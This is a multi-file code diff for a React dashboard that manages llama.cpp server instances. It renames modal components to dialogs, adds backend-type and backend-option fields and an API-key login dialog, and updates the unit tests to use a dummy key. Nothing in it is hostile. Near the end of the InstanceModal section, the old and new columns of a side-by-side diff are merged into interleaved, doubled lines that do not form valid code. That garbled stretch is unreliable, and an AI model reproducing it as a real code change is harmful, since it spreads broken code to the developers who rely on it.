   const advancedFields = getAdvancedFields();
+  const basicBackendFields = getBasicBackendFields();
+  const advancedBackendFields = getAdvancedBackendFields();

-  // Reset form when modal opens/closes or when instance changes
+  // Reset form when dialog opens/closes or when instance changes
   useEffect(() => {
     if (open) {
       if (instance) {
@@ -52,6 +54,8 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
       setInstanceName("");
       setFormData({
         auto_restart: true, // Default value
+        backend_type: BackendType.LLAMA_CPP, // Default backend type
+        backend_options: {},
       });
     }
     setShowAdvanced(false); // Always start with basic view
@@ -66,6 +70,16 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
     }));
   };

+  const handleBackendFieldChange = (key: string, value: any) => {
+    setFormData((prev) => ({
+      ...prev,
+      backend_options: {
+        ...prev.backend_options,
+        [key]: value,
+      },
+    }));
+  };
+
   const handleNameChange = (name: string) => {
     setInstanceName(name);
     // Validate instance name
@@ -90,7 +104,24 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
     // Clean up undefined values to avoid sending empty fields
     const cleanOptions: CreateInstanceOptions = {};
     Object.entries(formData).forEach(([key, value]) => {
-      if (value !== undefined && value !== "" && value !== null) {
+      if (key === 'backend_options' && value && typeof value === 'object') {
+        // Handle backend_options specially - clean nested object
+        const cleanBackendOptions: any = {};
+        Object.entries(value).forEach(([backendKey, backendValue]) => {
+          if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
+            // Handle arrays - don't include empty arrays
+            if (Array.isArray(backendValue) && backendValue.length === 0) {
+              return;
+            }
+            cleanBackendOptions[backendKey] = backendValue;
+          }
+        });
+
+        // Only include backend_options if it has content
+        if (Object.keys(cleanBackendOptions).length > 0) {
+          (cleanOptions as any)[key] = cleanBackendOptions;
+        }
+      } else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
         // Handle arrays - don't include empty arrays
         if (Array.isArray(value) && value.length === 0) {
           return;
@@ -114,6 +145,16 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
   // Check if auto_restart is enabled
   const isAutoRestartEnabled = formData.auto_restart === true;

+  // Save button label logic
+  let saveButtonLabel = "Create Instance";
+  if (isEditing) {
+    if (instance?.status === "running") {
+      saveButtonLabel = "Update & Restart Instance";
+    } else {
+      saveButtonLabel = "Update Instance";
+    }
+  }
+
   return (
     <Dialog open={open} onOpenChange={onOpenChange}>
       <DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col">
@@ -187,8 +228,9 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
               (fieldKey) =>
                 fieldKey !== "auto_restart" &&
                 fieldKey !== "max_restarts" &&
-                fieldKey !== "restart_delay"
-            ) // Exclude auto_restart, max_restarts, and restart_delay as they're handled above
+                fieldKey !== "restart_delay" &&
+                fieldKey !== "backend_options" // backend_options is handled separately
+            )
             .map((fieldKey) => (
               <ZodFormField
                 key={fieldKey}
@@ -199,6 +241,21 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
             ))}
         </div>

+        {/* Backend Configuration Section */}
+        <div className="space-y-4">
+          <h3 className="text-lg font-medium">Backend Configuration</h3>
+
+          {/* Basic backend fields */}
+          {basicBackendFields.map((fieldKey) => (
+            <BackendFormField
+              key={fieldKey}
+              fieldKey={fieldKey}
+              value={formData.backend_options?.[fieldKey]}
+              onChange={handleBackendFieldChange}
+            />
+          ))}
+        </div>
+
         {/* Advanced Fields Toggle */}
         <div className="border-t pt-4">
           <Button
@@ -217,8 +274,8 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
             {
               advancedFields.filter(
                 (f) =>
-                  !["max_restarts", "restart_delay"].includes(f as string)
-              ).length
+                  !["max_restarts", "restart_delay", "backend_options"].includes(f as string)
+              ).length + advancedBackendFields.length
             }{" "}
             options)
           </span>
@@ -228,24 +285,51 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
       {/* Advanced Fields - Automatically generated from type (excluding restart options) */}
       {showAdvanced && (
         <div className="space-y-4 pl-6 border-l-2 border-muted">
-          <div className="space-y-4">
+          {/* Advanced instance fields */}
           {advancedFields
             .filter(
               (fieldKey) =>
-                !["max_restarts", "restart_delay"].includes(
+                !["max_restarts", "restart_delay", "backend_options"].includes(
                   fieldKey as string
                 )
-            ) // Exclude restart options as they're handled above
-            .sort()
-            .map((fieldKey) => (
-              <ZodFormField
-                key={fieldKey}
-                fieldKey={fieldKey}
-                value={formData[fieldKey]}
+            ).length > 0 && (
+            <div className="space-y-4">
+              <h4 className="text-md font-medium">Advanced Instance Configuration</h4>
+              {advancedFields
+                .filter(
+                  (fieldKey) =>
+                    !["max_restarts", "restart_delay", "backend_options"].includes(
onChange={handleFieldChange} fieldKey as string
/> )
))} )
</div> .sort()
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={fieldKey === 'backend_options' ? undefined : formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
)}
{/* Advanced backend fields */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
)}
</div> </div>
)} )}
</div> </div>
@@ -255,20 +339,16 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
<Button <Button
variant="outline" variant="outline"
onClick={handleCancel} onClick={handleCancel}
data-testid="modal-cancel-button" data-testid="dialog-cancel-button"
> >
Cancel Cancel
</Button> </Button>
<Button <Button
onClick={handleSave} onClick={handleSave}
disabled={!instanceName.trim() || !!nameError} disabled={!instanceName.trim() || !!nameError}
data-testid="modal-save-button" data-testid="dialog-save-button"
> >
{isEditing {saveButtonLabel}
? isRunning
? "Update & Restart Instance"
: "Update Instance"
: "Create Instance"}
</Button> </Button>
</DialogFooter> </DialogFooter>
</DialogContent> </DialogContent>
@@ -276,4 +356,4 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
); );
}; };
export default InstanceModal; export default InstanceDialog;
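
For orientation, the cleanup in handleSave above now produces a nested payload rather than flat flags. A minimal sketch of the resulting object, with illustrative values that are not taken from the diff:

import { BackendType, type CreateInstanceOptions } from '@/types/instance'

// Example shape only - the model path and layer count are made up.
const options: CreateInstanceOptions = {
  auto_restart: true,
  backend_type: BackendType.LLAMA_CPP, // top-level instance option
  backend_options: {                   // llama.cpp flags now live here
    model: 'models/example.gguf',
    gpu_layers: 15,
  },
}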

View File

@@ -18,8 +18,8 @@ function InstanceList({ editInstance }: InstanceListProps) {
     return (
       <div className="flex items-center justify-center py-12" aria-label="Loading">
         <div className="text-center">
-          <div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
-          <p className="text-gray-600">Loading instances...</p>
+          <div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
+          <p className="text-muted-foreground">Loading instances...</p>
         </div>
       </div>
     )
@@ -28,7 +28,7 @@ function InstanceList({ editInstance }: InstanceListProps) {
   if (error) {
     return (
       <div className="text-center py-12">
-        <div className="text-red-600 mb-4">
+        <div className="text-destructive mb-4">
           <p className="text-lg font-semibold">Error loading instances</p>
           <p className="text-sm">{error}</p>
         </div>
@@ -39,15 +39,15 @@ function InstanceList({ editInstance }: InstanceListProps) {
   if (instances.length === 0) {
     return (
       <div className="text-center py-12">
-        <p className="text-gray-600 text-lg mb-2">No instances found</p>
-        <p className="text-gray-500 text-sm">Create your first instance to get started</p>
+        <p className="text-foreground text-lg mb-2">No instances found</p>
+        <p className="text-muted-foreground text-sm">Create your first instance to get started</p>
       </div>
     )
   }

   return (
     <div className="space-y-4">
-      <h2 className="text-xl font-semibold text-gray-900 mb-6">
+      <h2 className="text-xl font-semibold text-foreground mb-6">
         Instances ({instances.length})
       </h2>

View File

@@ -11,6 +11,7 @@ import {
   DialogTitle,
 } from '@/components/ui/dialog'
 import { Badge } from '@/components/ui/badge'
+import { instancesApi } from '@/lib/api'
 import {
   RefreshCw,
   Download,
@@ -21,14 +22,14 @@ import {
   Settings
 } from 'lucide-react'

-interface LogsModalProps {
+interface LogsDialogProps {
   open: boolean
   onOpenChange: (open: boolean) => void
   instanceName: string
   isRunning: boolean
 }

-const LogsModal: React.FC<LogsModalProps> = ({
+const LogsDialog: React.FC<LogsDialogProps> = ({
   open,
   onOpenChange,
   instanceName,
@@ -46,48 +47,44 @@ const LogsModal: React.FC<LogsModalProps> = ({
   const refreshIntervalRef = useRef<NodeJS.Timeout | null>(null)

   // Fetch logs function
-  const fetchLogs = async (lines?: number) => {
-    if (!instanceName) return
-
-    setLoading(true)
-    setError(null)
-
-    try {
-      const params = lines ? `?lines=${lines}` : ''
-      const response = await fetch(`/api/v1/instances/${instanceName}/logs${params}`)
-
-      if (!response.ok) {
-        throw new Error(`Failed to fetch logs: ${response.status}`)
-      }
-
-      const logText = await response.text()
-      setLogs(logText)
-
-      // Auto-scroll to bottom
-      setTimeout(() => {
-        if (logContainerRef.current) {
-          logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
-        }
-      }, 100)
-    } catch (err) {
-      setError(err instanceof Error ? err.message : 'Failed to fetch logs')
-    } finally {
-      setLoading(false)
-    }
-  }
+  const fetchLogs = React.useCallback(
+    async (lines?: number) => {
+      if (!instanceName) return
+
+      setLoading(true)
+      setError(null)
+
+      try {
+        const logText = await instancesApi.getLogs(instanceName, lines)
+        setLogs(logText)
+
+        // Auto-scroll to bottom
+        setTimeout(() => {
+          if (logContainerRef.current) {
+            logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
+          }
+        }, 100)
+      } catch (err) {
+        setError(err instanceof Error ? err.message : 'Failed to fetch logs')
+      } finally {
+        setLoading(false)
+      }
+    },
+    [instanceName]
+  )

-  // Initial load when modal opens
+  // Initial load when dialog opens
   useEffect(() => {
     if (open && instanceName) {
-      fetchLogs(lineCount)
+      void fetchLogs(lineCount)
     }
-  }, [open, instanceName])
+  }, [open, instanceName, fetchLogs, lineCount])

   // Auto-refresh effect
   useEffect(() => {
     if (autoRefresh && isRunning && open) {
       refreshIntervalRef.current = setInterval(() => {
-        fetchLogs(lineCount)
+        void fetchLogs(lineCount)
       }, 2000) // Refresh every 2 seconds
     } else {
       if (refreshIntervalRef.current) {
@@ -101,7 +98,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
         clearInterval(refreshIntervalRef.current)
       }
     }
-  }, [autoRefresh, isRunning, open, lineCount])
+  }, [autoRefresh, isRunning, open, lineCount, fetchLogs])

   // Copy logs to clipboard
   const copyLogs = async () => {
@@ -135,7 +132,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
   // Apply new line count
   const applyLineCount = () => {
-    fetchLogs(lineCount)
+    void fetchLogs(lineCount)
     setShowSettings(false)
   }
@@ -198,7 +195,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
             <Button
               variant="outline"
               size="sm"
-              onClick={() => fetchLogs(lineCount)}
+              onClick={() => void fetchLogs(lineCount)}
               disabled={loading}
             >
               {loading ? (
@@ -290,7 +287,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
         <div className="flex items-center gap-2 w-full">
           <Button
             variant="outline"
-            onClick={copyLogs}
+            onClick={() => void copyLogs()}
             disabled={!logs}
           >
             {copied ? (
@@ -327,4 +324,4 @@ const LogsModal: React.FC<LogsModalProps> = ({
   )
 }

-export default LogsModal
+export default LogsDialog
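
The fetchLogs rewrite above follows a common pattern: memoize the async loader with useCallback so it can sit in effect dependency arrays without retriggering on every render, and prefix fire-and-forget calls with `void`. A minimal sketch of the same pattern, assuming the instancesApi.getLogs helper from the diff:

import React, { useCallback, useEffect, useState } from 'react'
import { instancesApi } from '@/lib/api'

function LogsPane({ open, instanceName }: { open: boolean; instanceName: string }) {
  const [logs, setLogs] = useState('')

  // Referentially stable until instanceName changes.
  const load = useCallback(async () => {
    setLogs(await instancesApi.getLogs(instanceName))
  }, [instanceName])

  useEffect(() => {
    // `void` marks the promise as intentionally un-awaited.
    if (open) void load()
  }, [open, load])

  return <pre>{logs}</pre>
}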

View File

@@ -0,0 +1,151 @@
import React, { useState, useEffect } from 'react'
import { Button } from '@/components/ui/button'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import {
Dialog,
DialogContent,
DialogDescription,
DialogFooter,
DialogHeader,
DialogTitle,
} from '@/components/ui/dialog'
import { AlertCircle, Key, Loader2 } from 'lucide-react'
import { useAuth } from '@/contexts/AuthContext'
interface LoginDialogProps {
open: boolean
onOpenChange?: (open: boolean) => void
}
const LoginDialog: React.FC<LoginDialogProps> = ({
open,
onOpenChange,
}) => {
const { login, isLoading, error, clearError } = useAuth()
const [apiKey, setApiKey] = useState('')
const [localLoading, setLocalLoading] = useState(false)
// Clear form and errors when dialog opens/closes
useEffect(() => {
if (open) {
setApiKey('')
clearError()
}
}, [open, clearError])
// Clear error when user starts typing
useEffect(() => {
if (error && apiKey) {
clearError()
}
}, [apiKey, error, clearError])
const handleSubmit = async (e: React.FormEvent) => {
e.preventDefault()
if (!apiKey.trim()) {
return
}
setLocalLoading(true)
try {
await login(apiKey.trim())
// Login successful - dialog will close automatically when auth state changes
setApiKey('')
} catch (err) {
// Error is handled by the AuthContext
console.error('Login failed:', err)
} finally {
setLocalLoading(false)
}
}
const handleKeyDown = (e: React.KeyboardEvent<HTMLInputElement>) => {
if (e.key === 'Enter' && !isSubmitDisabled) {
// Create a synthetic FormEvent to satisfy handleSubmit's type
const syntheticEvent = {
preventDefault: () => {},
} as React.FormEvent<HTMLFormElement>;
void handleSubmit(syntheticEvent)
}
}
const isSubmitDisabled = !apiKey.trim() || isLoading || localLoading
return (
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent
className="sm:max-w-md"
showCloseButton={false} // Prevent closing without auth
>
<DialogHeader>
<DialogTitle className="flex items-center gap-2">
<Key className="h-5 w-5" />
Authentication Required
</DialogTitle>
<DialogDescription>
Please enter your management API key to access the Llamactl dashboard.
</DialogDescription>
</DialogHeader>
<form onSubmit={(e) => { void handleSubmit(e) }}>
<div className="grid gap-4 py-4">
{/* Error Display */}
{error && (
<div className="flex items-center gap-2 p-3 bg-destructive/10 border border-destructive/20 rounded-lg">
<AlertCircle className="h-4 w-4 text-destructive flex-shrink-0" />
<span className="text-sm text-destructive">{error}</span>
</div>
)}
{/* API Key Input */}
<div className="grid gap-2">
<Label htmlFor="apiKey">
Management API Key <span className="text-red-500">*</span>
</Label>
<Input
id="apiKey"
type="password"
value={apiKey}
onChange={(e) => setApiKey(e.target.value)}
onKeyDown={handleKeyDown}
placeholder="sk-management-..."
disabled={isLoading || localLoading}
className={error ? "border-red-500" : ""}
autoFocus
autoComplete="off"
/>
<p className="text-sm text-muted-foreground">
Your management API key is required to access instance management features.
</p>
</div>
</div>
<DialogFooter className="flex gap-2">
<Button
type="submit"
disabled={isSubmitDisabled}
data-testid="login-submit-button"
>
{(isLoading || localLoading) ? (
<>
<Loader2 className="h-4 w-4 animate-spin" />
Authenticating...
</>
) : (
<>
<Key className="h-4 w-4" />
Login
</>
)}
</Button>
</DialogFooter>
</form>
</DialogContent>
</Dialog>
)
}
export default LoginDialog
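
One way this dialog might be wired up (an assumption, not shown in the diff): keep it open whenever the user is unauthenticated and render the rest of the app only after login succeeds.

import type { ReactNode } from 'react'
import { useAuth } from '@/contexts/AuthContext'
import LoginDialog from '@/components/LoginDialog'

function AuthGate({ children }: { children: ReactNode }) {
  const { isAuthenticated, isLoading } = useAuth()

  // Wait for the stored-key check before deciding what to show.
  if (isLoading) return null

  return (
    <>
      <LoginDialog open={!isAuthenticated} />
      {isAuthenticated && children}
    </>
  )
}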

View File

@@ -19,6 +19,15 @@ import {
 } from 'lucide-react'
 import { serverApi } from '@/lib/api'

+// Helper to get version from environment
+const getAppVersion = (): string => {
+  try {
+    return (import.meta.env as Record<string, string>).VITE_APP_VERSION || 'unknown'
+  } catch {
+    return 'unknown'
+  }
+}
+
 interface SystemInfoModalProps {
   open: boolean
   onOpenChange: (open: boolean) => void
@@ -30,7 +39,7 @@ interface SystemInfo {
   help: string
 }

-const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
+const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
   open,
   onOpenChange
 }) => {
@@ -59,7 +68,7 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
     }
   }

-  // Load data when modal opens
+  // Load data when dialog opens
   useEffect(() => {
     if (open) {
       fetchSystemInfo()
@@ -109,9 +118,20 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
           </div>
         ) : systemInfo ? (
           <div className="space-y-6">
-            {/* Version Section */}
+            {/* Llamactl Version Section */}
             <div className="space-y-3">
-              <h3 className="font-semibold">Version</h3>
+              <h3 className="font-semibold">Llamactl Version</h3>
+              <div className="bg-gray-900 rounded-lg p-4">
+                <pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
+                  {getAppVersion()}
+                </pre>
+              </div>
+            </div>
+
+            {/* Llama Server Version Section */}
+            <div className="space-y-3">
+              <h3 className="font-semibold">Llama Server Version</h3>
               <div className="bg-gray-900 rounded-lg p-4">
                 <div className="mb-2">
@@ -180,4 +200,4 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
   )
 }

-export default SystemInfoModal
+export default SystemInfoDialog
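
getAppVersion reads VITE_APP_VERSION from the build environment. One way to supply it (a sketch; the repo may do this differently) is Vite's define option:

// vite.config.ts - injects the package version at build time.
// Importing package.json assumes "resolveJsonModule" is enabled.
import { defineConfig } from 'vite'
import { version } from './package.json'

export default defineConfig({
  define: {
    'import.meta.env.VITE_APP_VERSION': JSON.stringify(version),
  },
})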

View File

@@ -3,12 +3,13 @@ import { Input } from '@/components/ui/input'
 import { Label } from '@/components/ui/label'
 import { Checkbox } from '@/components/ui/checkbox'
 import type { CreateInstanceOptions } from '@/types/instance'
+import { BackendType } from '@/types/instance'
 import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'

 interface ZodFormFieldProps {
   fieldKey: keyof CreateInstanceOptions
-  value: any
-  onChange: (key: keyof CreateInstanceOptions, value: any) => void
+  value: string | number | boolean | string[] | undefined
+  onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
 }

 const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
@@ -18,18 +19,42 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
   // Get type from Zod schema
   const fieldType = getFieldType(fieldKey)

-  const handleChange = (newValue: any) => {
+  const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
     onChange(fieldKey, newValue)
   }

   const renderField = () => {
+    // Special handling for backend_type field - render as dropdown
+    if (fieldKey === 'backend_type') {
+      return (
+        <div className="grid gap-2">
+          <Label htmlFor={fieldKey}>
+            {config.label}
+            {config.required && <span className="text-red-500 ml-1">*</span>}
+          </Label>
+          <select
+            id={fieldKey}
+            value={typeof value === 'string' ? value : BackendType.LLAMA_CPP}
+            onChange={(e) => handleChange(e.target.value || undefined)}
+            className="flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background file:border-0 file:bg-transparent file:text-sm file:font-medium placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50"
+          >
+            <option value={BackendType.LLAMA_CPP}>Llama Server</option>
+            {/* Add more backend types here as they become available */}
+          </select>
+          {config.description && (
+            <p className="text-sm text-muted-foreground">{config.description}</p>
+          )}
+        </div>
+      )
+    }
+
     switch (fieldType) {
       case 'boolean':
         return (
           <div className="flex items-center space-x-2">
             <Checkbox
               id={fieldKey}
-              checked={value || false}
+              checked={typeof value === 'boolean' ? value : false}
               onCheckedChange={(checked) => handleChange(checked)}
             />
             <Label htmlFor={fieldKey} className="text-sm font-normal">
@@ -51,10 +76,14 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
           <Input
             id={fieldKey}
             type="number"
-            value={value || ''}
+            step="any" // This allows decimal numbers
+            value={typeof value === 'string' || typeof value === 'number' ? value : ''}
             onChange={(e) => {
               const numValue = e.target.value ? parseFloat(e.target.value) : undefined
-              handleChange(numValue)
+              // Only update if the parsed value is valid or the input is empty
+              if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
+                handleChange(numValue)
+              }
             }}
             placeholder={config.placeholder}
           />
@@ -101,7 +130,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
           <Input
             id={fieldKey}
             type="text"
-            value={value || ''}
+            value={typeof value === 'string' || typeof value === 'number' ? value : ''}
             onChange={(e) => handleChange(e.target.value || undefined)}
             placeholder={config.placeholder}
           />
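
getFieldType comes from zodFormUtils, which is not shown in this diff. An illustrative sketch of how such a helper could classify fields from a Zod schema (the real implementation may differ):

import { z } from 'zod'

function fieldTypeOf(schema: z.ZodTypeAny): 'boolean' | 'number' | 'text' {
  // Unwrap optional fields so z.boolean().optional() still maps to 'boolean'.
  const inner = schema instanceof z.ZodOptional ? schema.unwrap() : schema
  if (inner instanceof z.ZodBoolean) return 'boolean'
  if (inner instanceof z.ZodNumber) return 'number'
  return 'text'
}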

View File

@@ -1,8 +1,9 @@
-import { describe, it, expect, vi, beforeEach } from 'vitest'
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
 import { render, screen } from '@testing-library/react'
 import userEvent from '@testing-library/user-event'
 import InstanceCard from '@/components/InstanceCard'
 import type { Instance } from '@/types/instance'
+import { BackendType } from '@/types/instance'

 // Mock the health hook since we're not testing health logic here
 vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,19 +18,25 @@ describe('InstanceCard - Instance Actions and State', () => {
   const stoppedInstance: Instance = {
     name: 'test-instance',
-    running: false,
-    options: { model: 'test-model.gguf' }
+    status: 'stopped',
+    options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
   }

   const runningInstance: Instance = {
     name: 'running-instance',
-    running: true,
-    options: { model: 'running-model.gguf' }
+    status: 'running',
+    options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
   }

   beforeEach(() => {
     vi.clearAllMocks()
-  })
+    window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
+    global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
+  })
+
+  afterEach(() => {
+    vi.restoreAllMocks()
+  })

   describe('Instance Action Buttons', () => {
     it('calls startInstance when start button clicked on stopped instance', async () => {
@@ -93,7 +100,7 @@ describe('InstanceCard - Instance Actions and State', () => {
       expect(mockEditInstance).toHaveBeenCalledWith(stoppedInstance)
     })

-    it('opens logs modal when logs button clicked', async () => {
+    it('opens logs dialog when logs button clicked', async () => {
       const user = userEvent.setup()

       render(
@@ -109,7 +116,7 @@ describe('InstanceCard - Instance Actions and State', () => {
       const logsButton = screen.getByTitle('View logs')
       await user.click(logsButton)

-      // Should open logs modal (we can verify this by checking if modal title appears)
+      // Should open logs dialog (we can verify this by checking if dialog title appears)
       expect(screen.getByText(`Logs: ${stoppedInstance.name}`)).toBeInTheDocument()
     })
   })
@@ -272,19 +279,19 @@ describe('InstanceCard - Instance Actions and State', () => {
       />
     )

-    // Open logs modal
+    // Open logs dialog
     await user.click(screen.getByTitle('View logs'))

-    // Verify modal opened with correct instance data
+    // Verify dialog opened with correct instance data
     expect(screen.getByText('Logs: running-instance')).toBeInTheDocument()

-    // Close modal to test close functionality
+    // Close dialog to test close functionality
     const closeButtons = screen.getAllByText('Close')
-    const modalCloseButton = closeButtons.find(button =>
+    const dialogCloseButton = closeButtons.find(button =>
       button.closest('[data-slot="dialog-content"]')
     )
-    expect(modalCloseButton).toBeTruthy()
-    await user.click(modalCloseButton!)
+    expect(dialogCloseButton).toBeTruthy()
+    await user.click(dialogCloseButton!)

     // Modal should close
     expect(screen.queryByText('Logs: running-instance')).not.toBeInTheDocument()
@@ -295,7 +302,7 @@ describe('InstanceCard - Instance Actions and State', () => {
   it('handles instance with minimal data', () => {
     const minimalInstance: Instance = {
       name: 'minimal',
-      running: false,
+      status: 'stopped',
       options: {}
     }
@@ -317,7 +324,7 @@ describe('InstanceCard - Instance Actions and State', () => {
   it('handles instance with undefined options', () => {
     const instanceWithoutOptions: Instance = {
       name: 'no-options',
-      running: true,
+      status: 'running',
       options: undefined
     }
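
The new beforeEach setup exists because these components now render behind AuthProvider, which validates the stored management key with a request on mount; seeding sessionStorage and stubbing fetch with a 200 response lets that check pass without a server. The same setup, isolated as a sketch:

import { vi } from 'vitest'

// Test-only setup: fake credentials plus an always-OK fetch so
// AuthProvider's validation request succeeds offline.
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))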

View File

@@ -1,10 +1,12 @@
-import { describe, it, expect, vi, beforeEach } from 'vitest'
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
 import { render, screen } from '@testing-library/react'
 import userEvent from '@testing-library/user-event'
 import InstanceList from '@/components/InstanceList'
 import { InstancesProvider } from '@/contexts/InstancesContext'
 import { instancesApi } from '@/lib/api'
 import type { Instance } from '@/types/instance'
+import { BackendType } from '@/types/instance'
+import { AuthProvider } from '@/contexts/AuthContext'

 // Mock the API
 vi.mock('@/lib/api', () => ({
@@ -30,27 +32,38 @@ vi.mock('@/lib/healthService', () => ({
 function renderInstanceList(editInstance = vi.fn()) {
   return render(
-    <InstancesProvider>
-      <InstanceList editInstance={editInstance} />
-    </InstancesProvider>
+    <AuthProvider>
+      <InstancesProvider>
+        <InstanceList editInstance={editInstance} />
+      </InstancesProvider>
+    </AuthProvider>
   )
 }

 describe('InstanceList - State Management and UI Logic', () => {
   const mockEditInstance = vi.fn()

   const mockInstances: Instance[] = [
-    { name: 'instance-1', running: false, options: { model: 'model1.gguf' } },
-    { name: 'instance-2', running: true, options: { model: 'model2.gguf' } },
-    { name: 'instance-3', running: false, options: { model: 'model3.gguf' } }
+    { name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
+    { name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
+    { name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
   ]

+  const DUMMY_API_KEY = 'test-api-key-123'
+
   beforeEach(() => {
     vi.clearAllMocks()
+    window.sessionStorage.setItem('llamactl_management_key', DUMMY_API_KEY)
+    global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
+  })
+
+  afterEach(() => {
+    vi.restoreAllMocks()
   })

   describe('Loading State', () => {
-    it('shows loading spinner while instances are being fetched', async () => {
+    it('shows loading spinner while instances are being fetched', () => {
       // Mock a delayed response to test loading state
       vi.mocked(instancesApi.list).mockImplementation(() =>
         new Promise(resolve => setTimeout(() => resolve(mockInstances), 100))
@@ -220,27 +233,5 @@ describe('InstanceList - State Management and UI Logic', () => {
     expect(await screen.findByText('Instances (3)')).toBeInTheDocument()
     expect(screen.queryByText('Loading instances...')).not.toBeInTheDocument()
   })
-
-  it('handles transition from error back to loaded state', async () => {
-    // Start with error
-    vi.mocked(instancesApi.list).mockRejectedValue(new Error('Network error'))
-
-    const { rerender } = renderInstanceList(mockEditInstance)
-
-    expect(await screen.findByText('Error loading instances')).toBeInTheDocument()
-
-    // Simulate recovery (e.g., retry after network recovery)
-    vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
-
-    rerender(
-      <InstancesProvider>
-        <InstanceList editInstance={mockEditInstance} />
-      </InstancesProvider>
-    )
-
-    // Should eventually show instances
-    // Note: This test is somewhat artificial since the context handles retries
-    expect(screen.getByText('Error loading instances')).toBeInTheDocument()
-  })
   })
 })

View File

@@ -1,23 +1,30 @@
-import { describe, it, expect, vi, beforeEach } from 'vitest'
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
 import { render, screen, waitFor } from '@testing-library/react'
 import userEvent from '@testing-library/user-event'
-import InstanceModal from '@/components/InstanceModal'
+import InstanceDialog from '@/components/InstanceDialog'
 import type { Instance } from '@/types/instance'
+import { BackendType } from '@/types/instance'

 describe('InstanceModal - Form Logic and Validation', () => {
   const mockOnSave = vi.fn()
   const mockOnOpenChange = vi.fn()

   beforeEach(() => {
     vi.clearAllMocks()
-  })
+    window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
+    global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
+  })
+
+  afterEach(() => {
+    vi.restoreAllMocks()
+  })

   describe('Create Mode', () => {
     it('validates instance name is required', async () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -25,7 +32,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       )

       // Try to submit without name
-      const saveButton = screen.getByTestId('modal-save-button')
+      const saveButton = screen.getByTestId('dialog-save-button')
       expect(saveButton).toBeDisabled()

       // Add name, button should be enabled
@@ -41,7 +48,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -54,7 +61,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       await user.type(nameInput, 'test instance!')

       expect(screen.getByText(/can only contain letters, numbers, hyphens, and underscores/)).toBeInTheDocument()
